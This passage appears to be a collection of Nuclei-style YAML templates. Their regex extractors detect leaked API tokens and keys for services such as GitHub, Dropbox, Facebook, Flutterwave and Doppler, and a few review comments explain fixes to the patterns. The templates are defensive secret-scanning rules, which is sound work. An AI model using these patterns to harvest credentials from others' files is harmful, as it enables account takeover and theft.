4 | name: Doppler Service Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml 9 | - https://docs.doppler.com/reference/api 10 | - https://docs.doppler.com/reference/auth-token-formats 11 | metadata: 12 | verified: true 13 | tags: doppler,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 
| - \b(dp\.st\.(?:[a-z0-9\-_]{2,35}\.)?[a-zA-Z0-9]{40,44})\b 24 | # digest: 4a0a00473045022100b61969103e1649c2c330814280aea5b020d5f47ca55c9601d0647af01c47ddbf02200698f545c2217332324593dffcc44a82bccb5ec45faf31507c356b71ee4ad7cf:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/droneci-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: droneci-access-token 2 | 3 | info: 4 | name: Droneci Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,droneci,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a00483046022100b8f035e2f690ff06f1064c2fad434ef3faf43af1d86770b66ad77ecd44b93910022100fcf85bc0bcc2f473500998a866956b53f21d72f6325c80dbf3f758f0009614a2:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/dropbox/dropbox-access.yaml: -------------------------------------------------------------------------------- 1 | id: dropbox-access 2 | 3 | info: 4 | name: Dropbox Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dropbox.yml 9 | - https://developers.dropbox.com/oauth-guide 10 | - https://www.dropbox.com/developers/ 11 | - 
https://www.dropbox.com/developers/documentation/http/documentation 12 | metadata: 13 | verified: true 14 | tags: dropbox,keys,file 15 | 16 | file: 17 | - extensions: 18 | - all 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - \b(sl\.[a-zA-Z0-9_-]{130,152})(?:$|[^a-zA-Z0-9_-]) 25 | # digest: 490a0046304402203d0305c1997e320e30d2d0ad0460beb9c8478986a0f1b75f621167a79f8ca17302206da5b41a7402312c0d16fc2665349e3caf8aac3cee677a34f34089d739a743c6:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/dropbox/dropbox-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: dropbox-api-token 2 | 3 | info: 4 | name: Dropbox API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,dropbox,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4a0a00473045022100e195768a79de92a350e9ebbad15bac8d585c15a3990f36e0090992948eba7f0002203a3094d187586339c95b773f2a4c5f68f4dcc23bcebea94b0e590dc3751053b7:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/duffel-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: duffel-api-token 2 | 3 | info: 4 | name: Duffel API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - 
https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,duffel,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - duffel_(test|live)_(?i)[a-z0-9_\-=]{43} 22 | # digest: 4a0a0047304502202421c143203a023a8285876328e3581df769889a541d51b3bdcf72ab8fc117ff022100cb6b572f959e94b842ee120dd67fb14cafc499e3b4b6d4665dd07eb3e53b60f3:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/dynatrace-token.yaml: -------------------------------------------------------------------------------- 1 | id: dynatrace-token 2 | 3 | info: 4 | name: Dynatrace Token - Detect 5 | author: gaurang 6 | severity: high 7 | description: Dynatrace token was detected. 
8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 10 | cvss-score: 7.5 11 | cwe-id: CWE-200 12 | tags: file,keys,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | regex: 20 | - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" 21 | 22 | # Enhanced by md on 2023/05/04 23 | # digest: 4a0a00473045022100ab64299fac317f6ebc2349e91b5e7fb30e50b5c612e13c00d561ee816089222602207a3b30fbfc67583401a9e652198a3dc609e1877e0f5451748c91df5ac5a1fffa:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/easypost/easypost-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: easypost-api-token 2 | 3 | info: 4 | name: Easypost API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.go 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml 10 | metadata: 11 | verified: true 12 | tags: file,keys,easypost,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - EZAK(?i)[a-z0-9]{54} 23 | # digest: 4b0a00483046022100e61496ecd8994a3249bfa7ced4fdb49d6518b2b47fc556b3e611abeecd64c2c1022100c69eb40905d2e780d9e2a07b44b0a0956cbfc868c0b9e46c93421e26a73b9c21:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/easypost/easypost-test-token.yaml: -------------------------------------------------------------------------------- 1 | id: easypost-test-token 2 | 3 | info: 4 | name: Easypost Test API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - 
https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.go 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml 10 | metadata: 11 | verified: true 12 | tags: file,keys,easypost,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - EZTK(?i)[a-z0-9]{54} 23 | # digest: 4b0a00483046022100a8a903d8c12982d4215d7d686683821b3a72ee119e106b1c62de92ea9e2e8891022100dda07ef96999d284589a8ab9524c24512ac4e4be6190717fd70fb0837e99b08d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/etsy-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: etsy-access-token 2 | 3 | info: 4 | name: Etsy Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,etsy,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4a0a00473045022060ce8a53571f37202449c1685892f383465c312d2048578d5a202817d0611dfe022100e934a548eea41ac9818e3efffe2c9da795a395f884d4a1f10c0392de726fcf15:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/facebook/facebook-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-api-token 2 | 3 | 
info: 4 | name: Facebook API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,facebook,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4a0a00473045022039cfc3385a5e54130639427498934edb6851cbbfa0cb2fa9e0766c80de9c2f06022100a24d18ff30e17c296e32f42a80fee23cf4ae78eb0e82b85e1b399663945788f7:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/facebook/facebook-client-id.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-client-id 2 | 3 | info: 4 | name: Facebook Client ID - Detect 5 | author: gaurang 6 | severity: info 7 | description: Facebook client ID token was detected. 
8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N 10 | cvss-score: 0 11 | cwe-id: CWE-200 12 | tags: keys,file,token,facebook 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | regex: 21 | - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]" 22 | 23 | # Enhanced by md on 2023/05/04 24 | # digest: 490a0046304402205c3ed81a6b30472131610c16c17b09e837f4a50a24ea7855646cd4f63681693102206d187a7c8a35d1a8a6d44bc7ffb3df51f06401d98e210d0f0233744e5cf0496b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/facebook/facebook-secret.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-secret-key 2 | 3 | info: 4 | name: Facebook Secret Key - Detect 5 | author: gaurang 6 | severity: low 7 | description: Facebook secret key token was detected. 8 | tags: keys,file,token,facebook 9 | 10 | file: 11 | - extensions: 12 | - all 13 | 14 | extractors: 15 | - type: regex 16 | regex: 17 | - "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]" 18 | # digest: 490a004630440220088a4482a94c06fc1c8f203f3c7c1bb1c49303682b030f8012e682c9b0b1a4d6022069258d660c85e0daa2e6406090f1d54b78ac348fbb963c372d123327433408ee:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/facebook/fb-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: fb-access-token 2 | 3 | info: 4 | name: Facebook Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/facebook.yml 9 | - https://developers.facebook.com/docs/facebook-login/access-tokens/ 10 | metadata: 11 | verified: true 12 | tags: file,keys,facebook,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | 
extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '\b(EAACEdEose0cBA[a-zA-Z0-9]+)\b' 23 | # digest: 4b0a00483046022100906343469fb8f96da3ccf0963909ce5c20670bdff9d3b67347567d8983225e880221008bae64c94e2bbd5ae50d2d96d011e27e00695b52e82a7be86533132940bd8095:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/fastly-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: fastly-api-token 2 | 3 | info: 4 | name: Fastly API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,fastly,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a00483046022100d8441e43f35e1384e748abac2ddc93f5e90a14d06b06fb6f76e4762dcbe29ea602210095180944d4b581d9d4ee114b75f3ee2d820269c52e7da2d4d8a105f3e245a0ba:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/fcm-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: fcm-api-key 2 | 3 | info: 4 | name: Firebase Cloud Messaging Token 5 | author: Devang-Solanki 6 | severity: medium 7 | tags: file,keys,token,fcm,firebase,google 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - '[A-Za-z0-9-_]+:APA91b[A-Za-z0-9-_#]+' 16 | # digest: 
4a0a00473045022041f056406b85bb039bce810b2835a5ab8a446a6b6dfac1a5656b0ff7bff221f2022100b130f489cf048057110e68b3a5d891878db9a6bc0d486eb07842a6f37510479a:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/figma-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: figma-access-token 2 | 3 | info: 4 | name: Figma Personal Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/figma.yml 9 | - https://www.figma.com/developers/api 10 | metadata: 11 | verified: true 12 | tags: file,keys,figma,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)figma.{0,20}\b([0-9a-f]{4}-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b 22 | # digest: 4a0a00473045022100cbc7b923b9821d8b0da62a6152e2c9887062352d3f428e626da0e38bd455b6fe02201a9d7e25bc38f63682229f636ca9733c20b8de5e05453cd9ef09cda9f87186f8:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/finicity/finicity-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: finicity-api-token 2 | 3 | info: 4 | name: Finicity API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,finicity,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:finicity)(?:[0-9a-z\-_\t 
.]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a00483046022100f241e2b7819d9662106d68984ceab12ce6488feefc724d94bc7a131c814f1bc3022100d335261dd3b17fa626f653da06a0287f63003626693e3a6ae7dc137786af7a13:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/finnhub-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: finnhub-access-token 2 | 3 | info: 4 | name: Finnhub Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,finnhub,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4a0a00473045022100b50377388b15123b007f295e2b22c113fbbf59ec497c11f8245addf21da0d8a402200d62fc352af0319cc578ce82baed797de40b401a4885bd1abd5351225f01e68f:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/firebase-database.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-database 2 | 3 | info: 4 | name: Firebase Database Detect 5 | author: gaurang 6 | severity: info 7 | tags: file,keys,token,firebase 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "[a-z0-9.-]+\\.firebaseio\\.com" 16 | - "[a-z0-9.-]+\\.firebaseapp\\.com" 17 | # digest: 
490a004630440220035a4d1d44e47b7b20a0944a2cfe2939806e33f5341fa5ccf188db65d7aa8e0802203d0226609d88e9be2f2c31212b32ec0a6785a3855820655cb94c95fa66f738a0:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/flickr-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: flickr-access-token 2 | 3 | info: 4 | name: Flickr Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.go 10 | metadata: 11 | verified: true 12 | tags: flickr,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022100e34de1ee37b96835acda1132433eec7c4b02c2a35b1139ae4b8e5aaa38e85e5e0220612e97d89129b040693343da576a8d7eee35944a3769c76dd269f5602e0d02db:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/flutter/flutterwave-encryption-key.yaml: -------------------------------------------------------------------------------- 1 | id: flutterwave-encryption-key 2 | 3 | info: 4 | name: Flutterwave Encryption Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.go 10 | metadata: 11 | verified: true 12 | tags: flutter,file,keys,flutterwave 13 | file: 
14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - FLWSECK_TEST-(?i)[a-h0-9]{12} 22 | 23 | # digest: 490a00463044022001bb728280f64a65aad5cf17534d751dbe1cda89c68bb06251a2232fe7ca0810022037d2fb62e03bd86162102d5d381a0c5a6c54728628a5381af1eeaac926773f91:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/flutter/flutterwave-public-key.yaml: -------------------------------------------------------------------------------- 1 | id: flutterwave-public-key 2 | 3 | info: 4 | name: Flutterwave Public Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.go 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.yaml 10 | metadata: 11 | verified: true 12 | tags: flutter,file,keys,flutterwave 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X 22 | 23 | # digest: 4a0a0047304502201663f48cdd3af7e4e844c938a840b398231226cf267ce2b9b71aee64b4f01b070221009b15d106d4003dba20c9c1de1a7531478ba5abe063299fa31fad81343c1b8e07:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/flutter/flutterwave-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: flutterwave-secret-key 2 | 3 | info: 4 | name: Flutterwave Secret Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.go 10 | metadata: 11 | 
verified: true 12 | tags: flutter,file,keys,flutterwave 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - FLWSECK_TEST-(?i)[a-h0-9]{32}-X 22 | 23 | # digest: 4a0a00473045022100ef800d5ff9a0070b05c95c26fea14222a4efb0739951eea468e07f08ccef665a022008c000020cb1a4316a03521c4fd6d3af85de85340d924cff0d0936b80b1ed85f:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/frameio-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: frameio-api-token 2 | 3 | info: 4 | name: Frameio API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.go 10 | metadata: 11 | verified: true 12 | tags: frameio,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - fio-u-(?i)[a-z0-9\-_=]{64} 22 | 23 | # digest: 4a0a0047304502200c5a4dfba3c1a826c28c745bd3debafd32fa105a12cd37a5c018300440233ad8022100836571fe9c99297bbbcd639faaac0f0b856d4a6049e8fcc201537c5068d7ac57:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/freshbooks-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: freshbooks-access-token 2 | 3 | info: 4 | name: Freshbooks Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.go 10 | 
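metadata: 11 | verified: true 12 | tags: freshbooks,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | # NOTE(review): this rule carried the Frame.io pattern (fio-u-...) verbatim, so it could not match a Freshbooks token and reported Frame.io tokens a second time under this id. The pattern now uses the keyword-anchored shape of the other gitleaks-derived rules in this set with a 64-character alphanumeric value; confirm against the referenced gitleaks rule. The digest below was presumably computed over the original content; regenerate or drop it if the loader checks it. 22 | - (?i)(?:freshbooks)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | 24 | # digest: 490a004630440220373919559ed5f79b42f4628fe2e75f9de9582f7447fdd43a711fe32f13993ece02207d990413ca61229e70e14b9d17990afbec9396475b33ba44faf734c9e4e27c16:922c64590222798bb761d5b6d8e72950 25 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/gcp-service-account.yaml: -------------------------------------------------------------------------------- 1 | id: gcp-service-account 2 | 3 | info: 4 | name: Google (GCP) Service-account 5 | author: gaurang 6 | severity: low 7 | tags: file,keys,token,google 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "\"type\": \"service_account\"" 16 | # digest: 4a0a00473045022100cb6dcfa7dcc1544a9d22b921bfe6ea06c853f81c2dba5230df89bb222cded8390220220342a2699d75a6104f3af08f65b6bc97b873889fadf53fb7214b9b712dd5f2:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/github/github-app-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-app-token 2 | 3 | info: 4 | name: Github App Token 5 | author: tanq16,DhiyaneshDK 6 | severity: medium 7 | tags: keys,file,token,github 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | # NOTE(review): single-quoted on purpose. In a double-quoted YAML scalar \b is the backspace escape (0x08), not the regex word boundary, so the original pattern only matched a token wrapped in backspace bytes and missed tokens in ordinary text. The digest below was presumably computed over the original content; regenerate or drop it if the loader checks it. 16 | - '\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\b' 17 | # digest: 4b0a00483046022100b9d3d1fd11451fe2d5bb3cc0d433ee22cae5ca24e86f5b60845cb3103ad053fe0221009741eb11789fe97cedd0f7fb821d82fa102bb7b65a4f00a99e9c3f2792cb8306:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/github/github-oauth-token.yaml: 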
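-------------------------------------------------------------------------------- 1 | id: github-oauth-token 2 | 3 | info: 4 | name: Github OAuth Access Token 5 | author: tanq16 6 | severity: high 7 | tags: file,keys,token,github 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | # NOTE(review): value class narrowed from '.' to [A-Za-z0-9_]. The wildcard accepted any 36 characters after the prefix (quotes, spaces, markup), which inflates false positives on a high-severity rule and extracts bytes that are not part of the token. Length is unchanged. The digest below was presumably computed over the original content; regenerate or drop it if the loader checks it. 16 | - "gho_[A-Za-z0-9_]{36}" 17 | # digest: 4a0a004730450221008c53926b33a3b4059610c1a3fea1979833257a4acc6a7b3f42f1be341cd326320220284a515e5b905b6e7eb5cfba9858b243614aaceaf6da411d2e1cd9368de769fe:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/github/github-personal-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-personal-token 2 | 3 | info: 4 | name: Github Personal Token 5 | author: geeknik 6 | severity: high 7 | tags: file,keys,token,github 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | # NOTE(review): value class narrowed from '.' to [A-Za-z0-9_] for both patterns so a bare prefix followed by arbitrary text no longer counts as a finding; the underscore is kept because the fine-grained github_pat_ form contains one inside the value. Lengths are unchanged. The digest below was presumably computed over the original content; regenerate or drop it if the loader checks it. 16 | - "ghp_[A-Za-z0-9_]{36}" 17 | - "github_pat_[A-Za-z0-9_]{82}" 18 | # digest: 4a0a0047304502203c2ec1412ad731d19d011f31640fed087cbff2458bb3566ef8b6eeab67685fb7022100ff8093aefd8308c39e24dd35a59ced0166d4d5142d2d53104ae639032ca9693f:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/github/github-refresh-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-refresh-token 2 | 3 | info: 4 | name: Github Refresh Token 5 | author: tanq16 6 | severity: high 7 | tags: file,keys,token,github 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | # NOTE(review): value class narrowed from '.' to [A-Za-z0-9_] so the rule stops matching arbitrary text after a bare ghr_ prefix. The length of 76 is kept as the author wrote it; verify it against current refresh-token samples from a test account. The digest below was presumably computed over the original content; regenerate or drop it if the loader checks it. 16 | - "ghr_[A-Za-z0-9_]{76}" 17 | # digest: 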